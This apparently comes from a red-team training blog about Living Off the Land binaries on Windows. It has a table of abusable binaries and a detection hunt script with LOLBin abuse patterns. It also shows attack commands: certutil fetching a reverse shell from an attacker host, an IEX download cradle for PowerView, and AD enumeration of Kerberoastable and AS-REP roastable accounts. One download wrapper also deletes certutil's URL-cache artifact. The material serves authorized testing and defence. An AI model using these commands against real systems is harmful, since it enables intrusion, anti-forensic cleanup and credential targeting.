LOLBins, also known as "Living Off the Land Binaries," are legitimate programs that ship with the operating system (or with common administrator toolsets) and that attackers abuse to carry out malicious activity while blending in with normal system use.
They were originally built as command-line utilities, scripts, and executables that help system administrators with management and configuration. Attackers, however, have repurposed them as powerful post-exploitation tools.
This guide covers what you need to know about LOLBins: why they are used, how they are abused, when to reach for them, and worked examples of using them to download files and perform domain reconnaissance.
Let's jump in.
Understanding Living Off the Land (LOTL)
Cyber security has advanced significantly in recent years with the emergence of Endpoint Detection and Response (EDR) tools.
EDRs can detect malicious code executed on disk and in memory, flag suspicious behavior with machine-learning models, and identify known malware instantly using threat intelligence. This makes attacking endpoint workstations with conventional malware very difficult.
To evade EDRs and other detection technologies, attackers have turned to "Living Off the Land" (LOTL). This tactic uses legitimate software and functionality already present on the targeted endpoint to achieve malicious goals, rather than installing malware or hacking tools.
It lets attackers avoid signature-based detection and blend in with the legitimate activity defenders expect to see on endpoint machines.
Examples of Living Off the Land include:
- Using native Windows functionality like PowerShell, Windows Management Instrumentation (WMI), etc.
- Using trusted tools that the IT team uses to administer machines.
- Using legitimate Windows binaries to achieve hacking objectives like establishing persistence, command and control, and data exfiltration.
There are many advantages to Living Off the Land. The main ones include:
These advantages make Living Off the Land a strong tactic during red team engagements, where remaining undetected while pursuing high-value targets is a key objective.
Unlike traditional penetration tests, which aim to find as many vulnerabilities and security weaknesses as possible, a red team is tasked with achieving a strategic objective and emulating an advanced persistent threat (APT).
This requires stealth, precision, and patience to fly under the radar and avoid detection by defenders. Living Off the Land aligns well with these requirements and is a common tactic.
Despite these advantages, using native binaries presents challenges. These include:
Now that you know what Living Off the Land means, let's explore how attackers execute this tactic using LOLBins and LOLBAS.
What Are LOLBins and LOLBAS?
Attackers use Living Off the Land Binaries (LOLBins) and Living Off the Land Binaries And Scripts (LOLBAS) to carry out Living Off the Land attacks. These are the specific executables, scripts, and libraries that attackers abuse.
LOLBins
LOLBins are the Windows binary executables you can use to perform Living Off the Land tactics: avoid detection, bypass security controls, and slip past skilled defenders.
They have the following key characteristics:
- They're legitimate executables in the Windows or Linux operating system (or in a suite of administrator tools).
- On Windows they're signed by Microsoft, so the operating system and security software treat them as trusted (Linux LOLBins are usually trusted simply because they are part of the base install).
- They come pre-installed on the target system, meaning you don't need to download and install anything to use them during an attack.
Examples of LOLBins include PowerShell (powershell.exe) for system administration and automation, Bitsadmin (bitsadmin.exe) for downloading and uploading files, and Mshta (mshta.exe) for executing Microsoft HTML Applications (HTA).
These tools have many legitimate uses and are common in modern enterprise environments, which is exactly what makes their abuse hard to spot: defenders cannot simply block them and must instead distinguish malicious invocations from routine ones.
LOLBAS
LOLBAS broadens the LOLBins concept to include the legitimate scripts and libraries that ship with Windows, not just executables. Examples of such scripts include Pester.bat (which can be used for proxy execution), winrm.vbs (for lateral movement), and CL_LoadAssembly.ps1 (which loads managed DLLs in a way that sidesteps PowerShell and AppLocker restrictions).
The LOLBAS project was created to document legitimate binaries, scripts, and libraries that attackers can leverage for malicious actions. It catalogs binaries and scripts found in Windows and in common Microsoft-signed tooling, the function each can be abused for (download, execute, bypass, persist, and so on), and example command lines.
The project is community-driven and open-source. Each entry maps to MITRE ATT&CK techniques and links to detection content such as Sigma rules.
Other security initiatives cover related ground: LOLDrivers documents legitimate but vulnerable or malicious signed drivers that attackers abuse, and GTFOBins lists Unix and Linux binaries that can be used to bypass local security restrictions.
A pentester or red team operator will mainly use LOLBins and LOLBAS to evade detection.
These binaries and scripts are native to Windows environments and routinely used by system administrators to manage endpoint machines. Using them lets you remain stealthy and avoid triggering alarms designed to detect malware.
They also allow you to bypass common security controls such as application whitelisting (AWL, for example AppLocker or WDAC) and User Account Control (UAC), which are often configured in a hardened Windows environment.
You can also use them to proxy the execution of commands, scripts, and executables so that EDR solutions see a trusted, Microsoft-signed parent process rather than your tooling. It is all about evasion.
With this in mind, let's explore when you would use them during a pentest or red team engagement.
Living Off the Land Binaries and Scripts in Pentesting and Red Teaming
A penetration test or red team engagement will consist of several steps.
It will begin with planning and preparation, followed by a series of steps that lead to initial access to the target systems; then the post-exploitation phase begins. This is where you will use LOLBins to achieve your strategic objectives.
During post-exploitation, you must navigate around various security measures and tools, including anti-virus, network intrusion detection systems (IDS), and host-based firewalls.
However, the hardest technology to evade is EDR. Modern EDR catches most commercial and much custom malware, on disk and in memory, which is why you need LOLBins.
LOLBins let you blend in with legitimate system activity by using native tools already installed on the target. You avoid dropping additional malware, which reduces your exposure to in-memory scanning and signature matching. The caveat is that LOLBins are not invisible: EDRs and SIEM rules look for suspicious command lines (for example certutil with -urlcache, or mshta launching a remote HTA), so how you invoke a binary matters as much as which one you pick.
LOLBins help you stay hidden while performing post-exploitation tasks like data exfiltration, establishing persistence, and more.
Additionally, using LOLBins during a security test better simulates a real-world attack. Threat actors will use LOLBins for the exact reason a penetration tester and red teamer will: to remain undetected.
Using LOLBins in your testing activity provides a more realistic assessment that better tests the security controls your client has created.
Now that you know what Living Off the Land is and why it's vital during a pentest or red team engagement, let's explore some LOLBins and scripts you can use.
LOLBins List: Common and Useful LOLBins and Scripts
There are hundreds of LOLBins and scripts you can use to perform Living Off the Land in a Windows environment. Here are some of the most common in modern attacks.
| LOLBin / LOLBAS | Description | Usage |
| --- | --- | --- |
| PowerShell (powershell.exe) | The native Windows shell and scripting language for administration and automation. | Downloads files, runs scripts and in-memory payloads, and performs reconnaissance. Expect it to be restricted and heavily logged in enterprise environments (script block logging, AMSI, Constrained Language Mode). |
| WMI command line (wmic.exe) | Command-line client for Windows Management Instrumentation, used to manage systems and query information. | Executes binaries on local and remote systems (process call create), performs reconnaissance, and can create volume shadow copies so that NTDS.dit or the SAM can be copied for offline credential extraction, an alternative to running Mimikatz on the box. Deprecated, and not installed by default on the newest Windows 11 releases. |
| Bitsadmin (bitsadmin.exe) | Command-line tool for the Background Intelligent Transfer Service (BITS). | Creates BITS jobs that download, upload, or copy files and can run a command when a job completes, hiding payload retrieval and execution inside a legitimate service. An alternative to PowerShell download cradles. |
| Certutil (certutil.exe) | Command-line utility for managing certificates. | Downloads files (-urlcache -split -f) and Base64-encodes or decodes data (-encode, -decode) to slip payloads past content inspection. An alternative to PowerShell download cradles. |
| Mshta (mshta.exe) | Host for Microsoft HTML Applications (HTA). | Executes local or remote HTA files containing JScript or VBScript. An alternative to delivering code through Office macros. |
| Rundll32 (rundll32.exe) | Loads a DLL and calls an exported function from the command line. | Executes attacker-supplied DLLs (and, via mshtml, inline JavaScript) under a Microsoft-signed parent process. |
| Schtasks (schtasks.exe) | Utility for creating and managing scheduled tasks. | Creates tasks for persistence and, with the /S switch, on remote hosts for lateral movement. A native alternative to the persistence modules in frameworks like PowerSploit. |
| Sc (sc.exe) | Command-line tool for managing Windows services. | Creates and starts services locally or remotely for persistence and execution, including services whose binary path points at an alternate data stream. A native alternative to service-based persistence in C2 frameworks. |
| Csc (csc.exe) | The .NET Framework C# compiler. | Compiles C# source on the target into an executable or DLL, so you can bring source code rather than a pre-built binary that signatures would catch. |
| Msiexec (msiexec.exe) | Command-line front end for the Windows Installer (.msi). | Installs MSI packages, including directly from a URL, and can load DLLs through its /y and /z switches, locally or remotely. |
| CScript (cscript.exe) and WScript (wscript.exe) | Windows Script Host engines for JScript and VBScript. | Runs attacker scripts, including scripts stored in alternate data streams. |
| AD Module (ActiveDirectory PowerShell module) | The RSAT PowerShell module for managing Active Directory. | Performs AD reconnaissance (users, groups, trusts, GPOs) and supports persistence and lateral movement while looking like administrative traffic. A Microsoft-signed alternative to PowerView; note that it talks to a domain controller over Active Directory Web Services (TCP 9389) rather than LDAP. |
| Windows Subsystem for Linux (wsl.exe) | Command-line entry point to the Windows Subsystem for Linux. | Runs Linux binaries and arbitrary commands, which can download files or run tooling outside the Windows process model. Not enabled by default. |
| CL_LoadAssembly (CL_LoadAssembly.ps1) | Microsoft-signed diagnostic PowerShell script. | Proxy-loads managed DLLs, sidestepping AppLocker rules. |
| Windows Remote Management Settings (winrm.vbs) | Signed Windows script for managing Windows Remote Management (WinRM) settings. | Abused for remote command execution and lateral movement, and to bypass application whitelisting because the script runs under cscript. An alternative to PsExec. |
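This table is as useful to defenders as it is to operators, so here is the check a practitioner would run against it. The following is an added example and not code from the original article: a PowerShell hunt that matches process-creation telemetry against suspicious argument patterns for the binaries above. The rule list, regexes, function name, and sample events are this example's own constructions, not an official detection set.

```powershell
# Added example (not from the original article): hunt for suspicious invocations of the
# LOLBins in the table above in process-creation telemetry. The rule list and the sample
# events below are constructed for this demonstration, not an official detection set.

$LolbinRules = @(
    @{ Image = 'certutil.exe';            Pattern = '-urlcache|-decode|-encode';                  Why = 'download or payload (de)obfuscation' }
    @{ Image = 'bitsadmin.exe';           Pattern = '/transfer|/addfile|/setnotifycmdline';       Why = 'BITS download or execute-on-complete' }
    @{ Image = 'mshta.exe';               Pattern = 'https?://|javascript:|vbscript:';            Why = 'remote or inline HTA' }
    @{ Image = 'rundll32.exe';            Pattern = 'javascript:|\\users\\|\\temp\\|\\appdata\\'; Why = 'DLL from user-writable path or script trick' }
    @{ Image = 'msiexec.exe';             Pattern = 'https?://|\s/y\s|\s/z\s';                    Why = 'remote MSI or DLL export call' }
    @{ Image = 'wmic.exe';                Pattern = 'process call create|shadowcopy|/node:';      Why = 'remote execution or NTDS/SAM shadow copy' }
    @{ Image = 'schtasks.exe';            Pattern = '/create.*(/ru\s+system|/s\s)';               Why = 'SYSTEM persistence or remote task' }
    @{ Image = 'sc.exe';                  Pattern = '\\\\\S+\s+create|[^\s\\]:[^\\\s/]';          Why = 'remote service or ADS binary path' }
    @{ Image = 'cscript.exe|wscript.exe'; Pattern = '[^\s\\]:[^\\\s/]|\\appdata\\';              Why = 'script from ADS or user profile' }
)

function Find-LolbinAbuse {
    # Accepts any object with .Image (full path) and .CommandLine, e.g. mapped Sysmon ID 1 events
    param([Parameter(Mandatory, ValueFromPipeline)] $Record)
    process {
        $exe = [System.IO.Path]::GetFileName($Record.Image)
        foreach ($r in $LolbinRules) {
            # -match is case-insensitive in PowerShell, so 'SYSTEM' and 'system' both hit
            if ($exe -match "^($($r.Image))$" -and $Record.CommandLine -match $r.Pattern) {
                [pscustomobject]@{ Image = $exe; Reason = $r.Why; CommandLine = $Record.CommandLine }
            }
        }
    }
}

# Constructed sample telemetry: two routine admin commands followed by six abusive ones
$sample = @(
    @{ Image = 'C:\Windows\System32\certutil.exe';  CommandLine = 'certutil -store my' }
    @{ Image = 'C:\Windows\System32\wbem\wmic.exe'; CommandLine = 'wmic os get caption' }
    @{ Image = 'C:\Windows\System32\certutil.exe';  CommandLine = 'certutil -urlcache -split -f http://10.0.200.17/shell.exe shell.exe' }
    @{ Image = 'C:\Windows\System32\mshta.exe';     CommandLine = 'mshta http://10.0.200.17/payload.hta' }
    @{ Image = 'C:\Windows\System32\schtasks.exe';  CommandLine = 'schtasks /create /tn Updater /tr C:\Users\Public\u.exe /sc onlogon /ru SYSTEM' }
    @{ Image = 'C:\Windows\System32\sc.exe';        CommandLine = 'sc \\ws02 create svc binpath= C:\Windows\Temp\s.exe' }
    @{ Image = 'C:\Windows\System32\wbem\wmic.exe'; CommandLine = 'wmic /node:10.0.200.30 process call create "cmd /c whoami"' }
    @{ Image = 'C:\Windows\System32\wscript.exe';   CommandLine = 'wscript C:\Users\bob\AppData\Local\Temp\notes.txt:run.vbs' }
)

# The two benign lines stay silent; the other six are reported with the reason that fired
$sample | Find-LolbinAbuse | Format-Table -AutoSize

# On a host running Sysmon, map Event ID 1 into the same shape and pipe it in:
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -MaxEvents 5000 |
#     ForEach-Object {
#         $x = [xml]$_.ToXml()
#         [pscustomobject]@{
#             Image       = ($x.Event.EventData.Data | Where-Object Name -eq 'Image').'#text'
#             CommandLine = ($x.Event.EventData.Data | Where-Object Name -eq 'CommandLine').'#text'
#         }
#     } | Find-LolbinAbuse
```

The point for an operator is the mirror image: every pattern in that list is a command line you should avoid emitting verbatim. Security event 4688 only carries the command line when command-line auditing is enabled, so on hosts without Sysmon the hunt depends on that setting.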
That's enough theory. Let's look at ways you can use these LOLBins during an engagement.
Examples of LOLBins and LOLBAS in an Engagement
It's great to know what LOLBins are and why they're used during an engagement, but what does this look like in practice? Let's explore some LOLBin examples to understand why they're so powerful.
To follow along with the demonstrations in this article, try building your hacking lab by following the steps in our article, How to Create a Virtual Hacking Lab: Ultimate Setup. It will show you how to make your virtual playground, where you can practice all the hacking skills you learn.
Certutil
Certutil is a handy tool for pulling attacker tooling onto a compromised host. Browsers such as Microsoft Edge apply SmartScreen reputation checks and mark-of-the-web to downloads, so having a non-browser download path is useful.
Certutil sidesteps those browser-side controls because it is a Microsoft-signed utility fetching a URL, but it does not defeat the endpoint's antivirus: Windows Defender's real-time protection still scans the file once it lands on disk, and the certutil -urlcache command line itself is a well-known indicator that EDRs and Sigma rules alert on. It buys you the download, not invisibility.
If you try to download a known hacking tool with Microsoft Edge or another web browser, these protections will stop you.

However, if you use a LOLBin like Certutil instead, you bypass the browser protections and can pull the file down onto the targeted system.
To do this, run certutil -urlcache -split -f "<url>/<filename>" <filename>.

Here, you download a reverse shell onto the target from a web server on your Kali Linux attacker machine (10.0.200.17).
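As an added example that is not part of the original article, here is the same download wrapped in a PowerShell function that checks certutil's exit code, verifies the file hash with a second LOLBin (certutil -hashfile), and removes the copy certutil keeps in the user's CryptnetUrlCache. The URL, file name, and expected hash are placeholders for this demonstration.

```powershell
# Added example (not from the original article): fetch a file with certutil, confirm it
# landed intact, and clean up the URL-cache artifact certutil leaves behind.
# The URL, output path and expected hash below are placeholders.

function Get-FileViaCertutil {
    param(
        [Parameter(Mandatory)] [string] $Url,
        [Parameter(Mandatory)] [string] $OutFile,
        [string] $ExpectedSha256      # optional: SHA-256 of the file you staged on your server
    )

    # -urlcache: go through the URL cache; -split: write the response body to disk; -f: overwrite
    & certutil.exe -urlcache -split -f $Url $OutFile | Out-Null
    if ($LASTEXITCODE -ne 0) {
        throw "certutil failed with exit code $LASTEXITCODE (proxy, TLS or URL problem?)"
    }
    if (-not (Test-Path $OutFile)) {
        throw "certutil reported success but $OutFile is missing: check whether AV quarantined it"
    }

    # certutil -hashfile prints a header line, then the hash, then a status line;
    # older builds put spaces between the hex pairs, so strip whitespace before comparing
    $hash = ((& certutil.exe -hashfile $OutFile SHA256)[1] -replace '\s', '').ToLower()
    if ($ExpectedSha256 -and $hash -ne $ExpectedSha256.ToLower()) {
        Remove-Item $OutFile -Force
        throw "hash mismatch: got $hash, expected $ExpectedSha256 (truncated or tampered download)"
    }

    # certutil stores a copy of the response under %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache;
    # forensic analysts look there, so drop the cache entry once the file is on disk
    & certutil.exe -urlcache $Url delete | Out-Null

    [pscustomobject]@{ Path = $OutFile; Sha256 = $hash }
}

# Usage with the lab layout from the article (placeholder file name and hash):
Get-FileViaCertutil -Url 'http://10.0.200.17/shell.exe' -OutFile "$env:TEMP\shell.exe" `
    -ExpectedSha256 '0000000000000000000000000000000000000000000000000000000000000000'
```

Check the exit code and the file's presence separately: certutil can return success while Defender quarantines the file a moment later, and a silent failure there is how operators end up launching a payload that does not exist.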
AD Module
The PowerShell ActiveDirectory Module allows you to manage Windows Active Directory environments using various cmdlets.
You can edit users and groups, manage computers and Organizational Units (OUs), execute Active Directory queries, modify Group Policy Objects (GPOs), and even edit domain trust relationships.
To perform these actions as an attacker, you'd usually use something like PowerView, a PowerShell module designed for offensive operations that ships with cmdlets for domain reconnaissance. Unfortunately, it is a well-known hacking tool that most endpoint security products detect.
Let's try to download and run a PowerView cmdlet to find all the Active Directory users in the current domain by running the following commands:
# Define the URL where the PowerView script is hosted
$scriptUrl = "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1"
# Download and execute PowerView
IEX (New-Object Net.WebClient).DownloadString($scriptUrl)
# Run a PowerView command to list all domain users
Get-NetUser

As you can see, the PowerView cmdlet never runs: the script downloads, but when IEX tries to execute it, Windows Defender's AMSI integration recognizes the content as malicious and blocks it. A detection like this would blow your cover in a red team engagement and get you caught.
Instead, let's do the same with the PowerShell ActiveDirectory module. It is already present on domain controllers and most administrator workstations; if it is missing, installing it requires local admin rights and access to Windows Update (or a WSUS/Features on Demand source), and the install itself is an auditable action, so prefer running from a host that already has it. The commands are:
# Install RSAT for Active Directory
Add-WindowsCapability -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 -Online
# Query all domain users
Get-ADUser -Filter {Name -like "*"}

This time the query succeeds and returns every Active Directory user in the current domain, because the module is Microsoft-signed and its traffic looks like routine administration. From here you can identify high-value targets and continue your domain reconnaissance with the same LOLBin.
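Continuing from that point, as an added example that is not part of the original article: a PowerShell function built on the same ActiveDirectory module that pulls the account sets an operator usually wants first (Tier-0 group members, adminCount accounts, Kerberoastable and AS-REP roastable users, accounts flagged as needing no password, and passwords left in description fields). It assumes the module is present and that a domain controller is reachable over Active Directory Web Services; the function name and the bucket names in its output are this example's own.

```powershell
# Added example (not from the original article): enumerate the high-value accounts an
# operator looks for first, using only the signed ActiveDirectory module. Assumes the
# module is present and a domain controller is reachable over ADWS (TCP 9389).

Import-Module ActiveDirectory

function Get-HighValueTargets {
    param([string] $Server = (Get-ADDomain).PDCEmulator)   # any DC works; the PDC is a safe default

    # Unlike PowerView (LDAP/389), the AD module needs Active Directory Web Services on the DC
    if (-not (Test-NetConnection -ComputerName $Server -Port 9389 -InformationLevel Quiet)) {
        throw "ADWS (TCP 9389) on $Server is unreachable; the ActiveDirectory module cannot be used from here"
    }

    [ordered]@{
        # Tier-0 group membership, resolved through nested groups
        DomainAdmins     = Get-ADGroupMember -Identity 'Domain Admins' -Recursive -Server $Server |
                               Select-Object -ExpandProperty SamAccountName
        # adminCount=1 marks accounts that are (or once were) protected by AdminSDHolder
        AdminCountSet    = Get-ADUser -Filter { adminCount -eq 1 } -Server $Server |
                               Select-Object -ExpandProperty SamAccountName
        # User accounts carrying an SPN can be Kerberoasted offline
        Kerberoastable   = Get-ADUser -Filter { ServicePrincipalName -like "*" } -Properties ServicePrincipalName -Server $Server |
                               Where-Object SamAccountName -ne 'krbtgt' |
                               Select-Object SamAccountName, @{ n = 'SPN'; e = { $_.ServicePrincipalName -join ';' } }
        # Kerberos pre-authentication disabled: AS-REP roastable
        AsRepRoastable   = Get-ADUser -Filter { DoesNotRequirePreAuth -eq $true } -Server $Server |
                               Select-Object -ExpandProperty SamAccountName
        # Enabled accounts flagged as not requiring a password
        NoPasswordNeeded = Get-ADUser -Filter { PasswordNotRequired -eq $true -and Enabled -eq $true } -Server $Server |
                               Select-Object -ExpandProperty SamAccountName
        # Credentials left in the description attribute
        DescriptionHints = Get-ADUser -Filter { Description -like "*pass*" -or Description -like "*pwd*" } -Properties Description -Server $Server |
                               Select-Object SamAccountName, Description
    }
}

$targets = Get-HighValueTargets

# Summary first, so a large domain does not flood the console
foreach ($entry in $targets.GetEnumerator()) {
    '{0,-17} {1} hit(s)' -f $entry.Key, ($entry.Value | Measure-Object).Count
}

# Then drill into whichever bucket matters for the objective
$targets.Kerberoastable | Format-Table -AutoSize
```

Each query is a single ADWS search and returns only the attributes requested, which keeps the traffic indistinguishable from what the Active Directory Users and Computers console generates. The ADWS check up front matters in segmented networks: a jump host that can reach LDAP on a domain controller but not TCP 9389 will make every cmdlet fail with a generic server-unavailable error.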
Conclusion
LOLBins are the native Windows binaries you can use to perform Living Off the Land tactics.
They help you avoid detection, bypass common security controls, and stay under the radar of defenders while you perform post-exploitation activities, provided you invoke them in ways that look like routine administration.
This guide has covered when to use LOLBins during a penetration test or red team engagement and why they're valuable tools in your arsenal. We also worked through examples of popular LOLBins like Certutil and the ActiveDirectory PowerShell module. Use this knowledge and practice with LOLBins in your own lab environment.
If you want to learn more about LOLBins, defense evasion, and red teaming, join our StationX Accelerator Program. It includes everything you need to crush it in cyber security with 1000+ courses and labs, mentorship, and mastermind groups.
Here are some of the courses available: